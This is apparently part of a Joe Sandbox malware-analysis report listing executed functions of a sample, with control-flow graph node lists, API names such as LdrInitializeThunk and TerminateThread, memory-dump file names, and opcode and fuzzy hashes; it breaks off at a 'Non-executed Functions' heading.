                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: fd111e0d5c6899b638d861eb73e24331fa0c4868ec45f533a6f0ef9498ffd671
                                                                                                                                                      • Instruction ID: d55a515f6fbb46975e65e5835f1dd5dfb036f9df2c0e545818e71064b9493f31
                                                                                                                                                      • Opcode Fuzzy Hash: fd111e0d5c6899b638d861eb73e24331fa0c4868ec45f533a6f0ef9498ffd671
                                                                                                                                                      • Instruction Fuzzy Hash: D190023130150003D550B159551864A805997E1701FD1D519E4508D14CD92588566622
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2DA0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f39449a53a306ce0b5b16df625fc2725053d6a70473c4affe51e80c2c9ba2aab
                                                                                                                                                      • Instruction ID: 17d2f67468216d21e81c1212b8b60dd1727531c03e49455f0fcf2f87df75c001
                                                                                                                                                      • Opcode Fuzzy Hash: f39449a53a306ce0b5b16df625fc2725053d6a70473c4affe51e80c2c9ba2aab
                                                                                                                                                      • Instruction Fuzzy Hash: BA90023170150502D511B159450465A405E47D0741FD1C52AA5118D15ECA358992B531
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
                                                                                                                                                      • Instruction ID: a00baf8296fbb468db3daf362860aa2f7f1454433f10f95d11190ab9ac975d69
                                                                                                                                                      • Opcode Fuzzy Hash: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
                                                                                                                                                      • Instruction Fuzzy Hash: 1990027130150402D550B159450478A405947D0701FD1C519A9158D14EC6698DD57A65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
                                                                                                                                                      • Instruction ID: bb6a4024f2017a34cfc1f4814ae16b068fc93babc8f020a9c9338f631b269f39
                                                                                                                                                      • Opcode Fuzzy Hash: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
                                                                                                                                                      • Instruction Fuzzy Hash: 0D90023130150413D521A159460474B405D47D0741FD1C91AA4518D18DD6668952B521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 204 1e8f2b90-1e8f2b9c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
                                                                                                                                                      • Instruction ID: 4b742aeb5026e91c5a9a33e210505aa15ab5721915a6c4c57b21e789e4e78218
                                                                                                                                                      • Opcode Fuzzy Hash: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
                                                                                                                                                      • Instruction Fuzzy Hash: A290023130158802D520A159850478E405947D0701FD5C919A8518E18DC6A588917521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 205 1e8f2bc0-1e8f2bcc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 1c8faafa5530f8ab9c7cd49f9753aa36ac2935f79125354e30b8f58155ed492d
                                                                                                                                                      • Instruction ID: 7c2180952b4588369f620d5a3051feb48126f6e40b79377f9a824dd0cc8ebc35
                                                                                                                                                      • Opcode Fuzzy Hash: 1c8faafa5530f8ab9c7cd49f9753aa36ac2935f79125354e30b8f58155ed492d
                                                                                                                                                      • Instruction Fuzzy Hash: 2090023130150402D510A599550868A405947E0701FD1D519A9118D15EC67588917531
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 203 1e8f2b10-1e8f2b1c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
                                                                                                                                                      • Instruction ID: b1c29bfbe79d8c591d80c50f712eb090dd4a7910186f19a6a26d8553c4164bc6
                                                                                                                                                      • Opcode Fuzzy Hash: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
                                                                                                                                                      • Instruction Fuzzy Hash: F990023130150802D590B159450468E405947D1701FD1C51DA4119E14DCA258A597BA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F29F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 202 1e8f29f0-1e8f29fc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 766ae6bffc3112461a712c6e116a46ae97ac8276ffb42eb09fcdab8483fc5b4e
                                                                                                                                                      • Instruction ID: ce9b4d30fc8f4c67f696228a57aeeb86a86fd102de52df3d6b7a77a6e3234016
                                                                                                                                                      • Opcode Fuzzy Hash: 766ae6bffc3112461a712c6e116a46ae97ac8276ffb42eb09fcdab8483fc5b4e
                                                                                                                                                      • Instruction Fuzzy Hash: DA900235311500030515E559070454B409A47D57513D1C529F5109D10CD63188616521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0057395E, Relevance: 1.7, APIs: 1, Instructions: 167threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 57395e-5739a0 2 5739a1-5739a7 0->2 3 5739db-573ad5 TerminateThread 0->3 4 573945-573959 2->4 5 5739a9-5739d5 2->5 9 573c8d-573ca8 3->9 10 573adb-573aea 3->10 4->2 5->3 10->9 11 573af0-573af4 10->11 11->9 12 573afa-573afe 11->12 12->9 13 573b04-573b08 12->13 13->9 14 573b0e-573b12 13->14 14->9 15 573b18-573b1c 14->15 15->9 16 573b22-573b73 15->16 16->9 18 573b79-573b99 16->18 19 573b9a-573bee 18->19 21 573bf0-573bf9 19->21 22 573c0a-573c88 19->22 21->9 23 573bff-573c00 21->23 23->19
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: deb2125e77c76bc32663392d406669a53b7c2589b09f4257cc0b370ebb1a6dda
                                                                                                                                                      • Instruction ID: 84ea60fa205ace5eb64b0e1e6a0d25fb9c1f2b6a16f5240df6c6f14fdad929fa
                                                                                                                                                      • Opcode Fuzzy Hash: deb2125e77c76bc32663392d406669a53b7c2589b09f4257cc0b370ebb1a6dda
                                                                                                                                                      • Instruction Fuzzy Hash: 83513A366083929FD7128F20E5657E57FA5FF52330F1A859AC8884F4A2C3748E89E742
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573987, Relevance: 1.7, APIs: 1, Instructions: 154threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 25 573987-57398e 26 573990-5739a0 25->26 27 57395b 25->27 28 5739a1-5739a7 26->28 29 5739db-573ad5 TerminateThread 26->29 30 5739a6-5739ae 27->30 31 57395d-57395f 27->31 32 573945-573959 28->32 33 5739a9-5739d5 28->33 39 573c8d-573ca8 29->39 40 573adb-573aea 29->40 35 5739b0-5739d5 30->35 36 573939-573942 30->36 31->25 32->28 33->29 35->29 36->32 40->39 41 573af0-573af4 40->41 41->39 42 573afa-573afe 41->42 42->39 43 573b04-573b08 42->43 43->39 44 573b0e-573b12 43->44 44->39 45 573b18-573b1c 44->45 45->39 46 573b22-573b73 45->46 46->39 48 573b79-573b99 46->48 49 573b9a-573bee 48->49 51 573bf0-573bf9 49->51 52 573c0a-573c88 49->52 51->39 53 573bff-573c00 51->53 53->49
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 16b3b4d72e524b18a8040d676943a000c24133dcfc66e0e1496ce6b26684ff68
                                                                                                                                                      • Instruction ID: 7abbcf70d60703af96087c8766e5ba7b9c80baf8b3a5998c566a29d373bc785b
                                                                                                                                                      • Opcode Fuzzy Hash: 16b3b4d72e524b18a8040d676943a000c24133dcfc66e0e1496ce6b26684ff68
                                                                                                                                                      • Instruction Fuzzy Hash: C54147366083929FD3128F60A2657E57FA0FF52330F5AC6D9C4884F4A3C3648E99E742
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A0A, Relevance: 1.6, APIs: 1, Instructions: 145threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 55 573a0a-573ad5 TerminateThread 60 573c8d-573ca8 55->60 61 573adb-573aea 55->61 61->60 62 573af0-573af4 61->62 62->60 63 573afa-573afe 62->63 63->60 64 573b04-573b08 63->64 64->60 65 573b0e-573b12 64->65 65->60 66 573b18-573b1c 65->66 66->60 67 573b22-573b73 66->67 67->60 69 573b79-573b99 67->69 70 573b9a-573bee 69->70 72 573bf0-573bf9 70->72 73 573c0a-573c88 70->73 72->60 74 573bff-573c00 72->74 74->70
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: d526be7077c55232c891da846c1440bbdc043cbc9c78e4212fa6f82d49c0f18e
                                                                                                                                                      • Instruction ID: bc08c85ab9d2c9d343e95195effa871b2f444796aed871d6a632edf5ab34a563
                                                                                                                                                      • Opcode Fuzzy Hash: d526be7077c55232c891da846c1440bbdc043cbc9c78e4212fa6f82d49c0f18e
                                                                                                                                                      • Instruction Fuzzy Hash: 1E41A56B50D3525DE3028B10A2667E1BBD4FF55330F2689D6C0484F8A3C3A4CA99E745
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0057393C, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 100 57393c-573942 101 573945-5739a7 100->101 103 5739a9-573ad5 TerminateThread 101->103 108 573c8d-573ca8 103->108 109 573adb-573aea 103->109 109->108 110 573af0-573af4 109->110 110->108 111 573afa-573afe 110->111 111->108 112 573b04-573b08 111->112 112->108 113 573b0e-573b12 112->113 113->108 114 573b18-573b1c 113->114 114->108 115 573b22-573b73 114->115 115->108 117 573b79-573b99 115->117 118 573b9a-573bee 117->118 120 573bf0-573bf9 118->120 121 573c0a-573c88 118->121 120->108 122 573bff-573c00 120->122 122->118
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 2456ee2d77ed2861a9066b270ca7e5f6ad9bbf2dba428560ec208764dacccbf0
                                                                                                                                                      • Instruction ID: 8667f550440916ec2f7b58409cbcdb413f26ea62607c084faa644e4b1b6eed29
                                                                                                                                                      • Opcode Fuzzy Hash: 2456ee2d77ed2861a9066b270ca7e5f6ad9bbf2dba428560ec208764dacccbf0
                                                                                                                                                      • Instruction Fuzzy Hash: 414146766083429ED7158F10E6697E57BE5FF51330F2AC19AC8884F4A2C3748EC8E706
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 005738E3, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 76 5738e3-573942 77 573945-5739a7 76->77 79 5739a9-573ad5 TerminateThread 77->79 84 573c8d-573ca8 79->84 85 573adb-573aea 79->85 85->84 86 573af0-573af4 85->86 86->84 87 573afa-573afe 86->87 87->84 88 573b04-573b08 87->88 88->84 89 573b0e-573b12 88->89 89->84 90 573b18-573b1c 89->90 90->84 91 573b22-573b73 90->91 91->84 93 573b79-573b99 91->93 94 573b9a-573bee 93->94 96 573bf0-573bf9 94->96 97 573c0a-573c88 94->97 96->84 98 573bff-573c00 96->98 98->94
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 0e8e244bca17349543c22a38ba8288271ee6f620c17b005617a3f252964833b5
                                                                                                                                                      • Instruction ID: e4b834a99808c24829cc836432caadc5463e9b8e65de938dfda81cc6e4c788c1
                                                                                                                                                      • Opcode Fuzzy Hash: 0e8e244bca17349543c22a38ba8288271ee6f620c17b005617a3f252964833b5
                                                                                                                                                      • Instruction Fuzzy Hash: E831E5316043429FDB248E6498AD7E63BE6AF61370F5AC15ECC895B5A5C3344EC8EB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A80, Relevance: 1.6, APIs: 1, Instructions: 126threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 124 573a80-573ac2 126 573a45-573a7b TerminateThread 124->126 127 573ac3-573ad5 124->127 126->127 129 573c8d-573ca8 127->129 130 573adb-573aea 127->130 130->129 131 573af0-573af4 130->131 131->129 133 573afa-573afe 131->133 133->129 134 573b04-573b08 133->134 134->129 135 573b0e-573b12 134->135 135->129 136 573b18-573b1c 135->136 136->129 137 573b22-573b73 136->137 137->129 139 573b79-573b99 137->139 140 573b9a-573bee 139->140 142 573bf0-573bf9 140->142 143 573c0a-573c88 140->143 142->129 144 573bff-573c00 142->144 144->140
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 8e4259cf6e0f55c4ebbc8b9d11ecf492ab068b31ab09f5bf45c14b014074aa75
                                                                                                                                                      • Instruction ID: 04626be7a60500f4d69c9dc3410d9ad7c775395f08d9232205b9385961f930d1
                                                                                                                                                      • Opcode Fuzzy Hash: 8e4259cf6e0f55c4ebbc8b9d11ecf492ab068b31ab09f5bf45c14b014074aa75
                                                                                                                                                      • Instruction Fuzzy Hash: 1531F87650C342AED7128B50E2657E1BFE5FF51330F1AC6EAC4884F4A2C3648E89E741
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573962, Relevance: 1.6, APIs: 1, Instructions: 108threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 146 573962-573967 147 57396c-57397d 146->147 148 573969-57396b 146->148 147->146 150 57397f-573982 147->150 148->147 149 573938-573942 148->149 153 573945-573959 149->153 152 5739a1-5739a7 150->152 152->153 154 5739a9-573ad5 TerminateThread 152->154 153->152 159 573c8d-573ca8 154->159 160 573adb-573aea 154->160 160->159 161 573af0-573af4 160->161 161->159 162 573afa-573afe 161->162 162->159 163 573b04-573b08 162->163 163->159 164 573b0e-573b12 163->164 164->159 165 573b18-573b1c 164->165 165->159 166 573b22-573b73 165->166 166->159 168 573b79-573b99 166->168 169 573b9a-573bee 168->169 171 573bf0-573bf9 169->171 172 573c0a-573c88 169->172 171->159 173 573bff-573c00 171->173 173->169
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 7c3a70d7dcd81c978faa07d87a949652088e5ef89a3d63d85cc4c3f497c7897f
                                                                                                                                                      • Instruction ID: 8ddcd0d44c8858b006ed1bc30ba19ea6a6cafe3fc84304b6bbf551d67586afb2
                                                                                                                                                      • Opcode Fuzzy Hash: 7c3a70d7dcd81c978faa07d87a949652088e5ef89a3d63d85cc4c3f497c7897f
                                                                                                                                                      • Instruction Fuzzy Hash: 3B311631604252DFDB248E54D8A97EA3BA6BF51770F5AC16DCC895B096C3344EC8FB02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A84, Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 175 573a84-573a89 176 573a8e-573a9f 175->176 177 573a8b-573a8d 175->177 176->175 179 573aa1-573aa4 176->179 177->176 178 573a5a-573a6a TerminateThread 177->178 180 573a71-573a7b 178->180 181 573ac3-573ad5 179->181 180->181 182 573c8d-573ca8 181->182 183 573adb-573aea 181->183 183->182 184 573af0-573af4 183->184 184->182 185 573afa-573afe 184->185 185->182 186 573b04-573b08 185->186 186->182 187 573b0e-573b12 186->187 187->182 188 573b18-573b1c 187->188 188->182 189 573b22-573b73 188->189 189->182 191 573b79-573b99 189->191 192 573b9a-573bee 191->192 194 573bf0-573bf9 192->194 195 573c0a-573c88 192->195 194->182 196 573bff-573c00 194->196 196->192
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: c6f1e5be929f483f9579e3e8ed077372cfd603a31de081788e27fe62399287d9
                                                                                                                                                      • Instruction ID: 2935a12e35e4fb019373a573e57aa9ab3b4d54fb8497dd3697fb2a6d5c38e061
                                                                                                                                                      • Opcode Fuzzy Hash: c6f1e5be929f483f9579e3e8ed077372cfd603a31de081788e27fe62399287d9
                                                                                                                                                      • Instruction Fuzzy Hash: 2821D5356002069FDB258E10D4A9BE57F96BF51774F4AC29DC4890B095C3388EC9FB02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 198 1e8f2b2a-1e8f2b2f 199 1e8f2b3f-1e8f2b46 LdrInitializeThunk 198->199 200 1e8f2b31-1e8f2b38 198->200
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                                                      • Instruction ID: 0526cdf0536bf8354c8339042182d7e75aed50185f2fbedb0ad8df34d479ccf0
                                                                                                                                                      • Opcode Fuzzy Hash: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                                                      • Instruction Fuzzy Hash: 77B02B319014C1C5D600D720070870B790467C0B01F51C115D1020A00EC338C090F231
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 1E95FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
